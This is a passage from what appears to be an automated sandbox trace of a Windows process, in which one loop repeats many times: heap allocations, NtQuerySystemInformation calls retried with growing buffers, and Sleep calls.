SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0303.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0303.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0303.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0303.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0303.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.690] Sleep (dwMilliseconds=0x110) [0303.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0303.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0303.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0303.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0303.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0303.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0303.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.708] Sleep (dwMilliseconds=0x110) [0303.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0303.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0303.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0303.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0303.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0303.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0303.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0303.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0303.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.723] Sleep (dwMilliseconds=0x110) [0303.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0303.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0303.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0303.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0303.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0303.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0303.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0303.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0303.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.752] Sleep (dwMilliseconds=0x110) [0303.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0303.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0303.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0303.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0303.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0303.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0303.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.770] Sleep (dwMilliseconds=0x110) [0303.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0303.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0303.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0303.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0303.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0303.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0303.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0303.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0303.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.786] Sleep (dwMilliseconds=0x110) [0303.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0303.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0303.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0303.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0303.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0303.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0303.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0303.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0303.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.802] Sleep (dwMilliseconds=0x110) [0303.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0303.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0303.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0303.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0303.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0303.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0303.817] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0303.817] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.817] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0303.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.834] Sleep (dwMilliseconds=0x110) [0303.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0303.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0303.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0303.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0303.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0303.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0303.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0303.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0303.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.848] Sleep (dwMilliseconds=0x110) [0303.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0303.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0303.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0303.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0303.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0303.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0303.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0303.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0303.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.864] Sleep (dwMilliseconds=0x110) [0303.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0303.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0303.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0303.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0303.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0303.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0303.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0303.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0303.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.880] Sleep (dwMilliseconds=0x110) [0303.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0303.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0303.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0303.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0303.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0303.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0303.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0303.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0303.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.977] Sleep (dwMilliseconds=0x110) [0303.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0303.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0303.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0303.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0303.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0303.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0303.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0303.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0303.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0303.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0303.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0303.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0303.992] Sleep (dwMilliseconds=0x110) [0304.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0304.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0304.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0304.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0304.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0304.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0304.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0304.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0304.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.006] Sleep (dwMilliseconds=0x110) [0304.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0304.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0304.013] RtlAllocateHeap (HeapHandle=0x2560000, 